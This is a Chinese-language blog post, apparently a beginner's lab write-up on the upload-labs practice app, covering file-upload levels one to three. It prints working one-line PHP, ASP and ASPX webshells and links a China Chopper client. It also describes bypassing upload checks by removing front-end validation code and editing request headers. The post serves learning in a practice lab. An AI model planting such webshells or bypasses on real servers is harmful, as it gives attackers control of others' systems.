web安全 上传漏洞 upload-labs 一到三关

upload-labs

下载地址:github项目地址:https://github.com/c0ny1/upload-labs

安装:下载解压后,直接放在www目录下后,即可使用,看了没有数据库,但是我用的时候有点卡,页面的切换很慢。

webshell

通过上传一句话木马(也就是webshell)到目前web服务目录,从而获得系统权限,asp、php、jsp、aspx皆可。

常见一句话木马:

php:
<?php @eval($_POST['pass'])?>
<?php @eval($_POST['attack']) ?>
asp:
<%eval request ("pass")%>
aspx:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

然后配合中国菜刀使用 得到系统权限,

菜刀下载地址:https://github.com/raddyfiy/caidao-official-version.git

自己对比了md5 应该没问题

第一关:

先上传图片查看情况:

C:\Users\John\AppData\Roaming\Typora\typora-user-images\image-20201022151526154.png

直接上传一句话木马试试
image-20201022151650762.png

不行,那就有了第一个想法 改变一句话木马后缀名,将其拦截下来再进行更改,

抓包发现
image-20201022191708206.png
好像无法进行修改,我在网上查了下,看到有些第一题

转包的结果有更多的内容 可以修改文件后缀名等 我以为是

版本关系我又试了我电脑burp的其他两个版本 都是一样的结果 有以为是浏览器版本但应该不是 网上也没有搜出阿里 后来想了想可能是后台代码决定http头要发的数据

于是此条思路断了,尝试直接更改前端代码 我这里用的是火狐78.3 esr版本,在控制台删除了这段代码 前端绕过
image-20201022193617348.png
然后上传成功了,用得到的图片地址链接用菜刀连接
image-20201022194006808.png

image-20201022194034676.png
然后成功了。

后来我用google试了试 在前端删除代码后不管用依然无法上传

但火狐和google都应该是有缓存的 不知道为什么。

第二关:

直接上传一句话 进行观察
image-20201022194548126.png
错误了,但不是像第一关的弹窗,像之前将函数删除,无变化,这个文件类型判断应该是从后台执行的。

看看能否抓包 解决 发现和第一关一样 但是想到了自己可以改头部内容 之前都是改传递的参数 没试过增删头部内容 于是试了试
image-20201022195717905.pngimage-20201022195903991.pngimage-20201022195922732.png

用菜刀连接图片链接 成功了(工具还是得好好学学)
image-20201022200106270.png
)]

第三关:

直接上传测试:
image-20201023085000449.png

抓包
image-20201023085322738.png
)]

使用菜刀连接 我把病毒防护关了 为什么它会自动关闭 且点击无法运行了???运行后 且没修改成功

image-20201023091557244.png

但我看了下网上其他的 他们抓包的协议头数据为什么比我的多那么多东西

还在学习阶段 有不对的地方请指正 冲冲冲

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值